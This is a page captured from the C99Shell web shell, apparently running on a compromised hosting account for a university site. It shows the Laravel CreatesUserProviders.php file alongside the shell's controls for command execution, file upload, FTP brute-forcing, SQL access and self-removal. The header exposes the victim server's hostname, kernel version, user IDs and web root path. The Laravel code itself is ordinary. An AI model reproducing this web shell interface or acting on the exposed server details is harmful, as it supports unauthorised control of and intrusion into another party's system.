!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Auth/   drwxr-xr-x
Free 116.5 GB of 200.55 GB (58.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     CreatesUserProviders.php (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Auth;

use 
InvalidArgumentException;

trait 
CreatesUserProviders
{
    
/**
     * The registered custom provider creators.
     *
     * @var array
     */
    
protected $customProviderCreators = [];

    
/**
     * Create the user provider implementation for the driver.
     *
     * @param  string  $provider
     * @return \Illuminate\Contracts\Auth\UserProvider
     *
     * @throws \InvalidArgumentException
     */
    
public function createUserProvider($provider)
    {
        
$config $this->app['config']['auth.providers.'.$provider];

        if (isset(
$this->customProviderCreators[$config['driver']])) {
            return 
call_user_func(
                
$this->customProviderCreators[$config['driver']], $this->app$config
            
);
        }

        switch (
$config['driver']) {
            case 
'database':
                return 
$this->createDatabaseProvider($config);
            case 
'eloquent':
                return 
$this->createEloquentProvider($config);
            default:
                throw new 
InvalidArgumentException("Authentication user provider [{$config['driver']}] is not defined.");
        }
    }

    
/**
     * Create an instance of the database user provider.
     *
     * @param  array  $config
     * @return \Illuminate\Auth\DatabaseUserProvider
     */
    
protected function createDatabaseProvider($config)
    {
        
$connection $this->app['db']->connection();

        return new 
DatabaseUserProvider($connection$this->app['hash'], $config['table']);
    }

    
/**
     * Create an instance of the Eloquent user provider.
     *
     * @param  array  $config
     * @return \Illuminate\Auth\EloquentUserProvider
     */
    
protected function createEloquentProvider($config)
    {
        return new 
EloquentUserProvider($this->app['hash'], $config['model']);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0108 ]--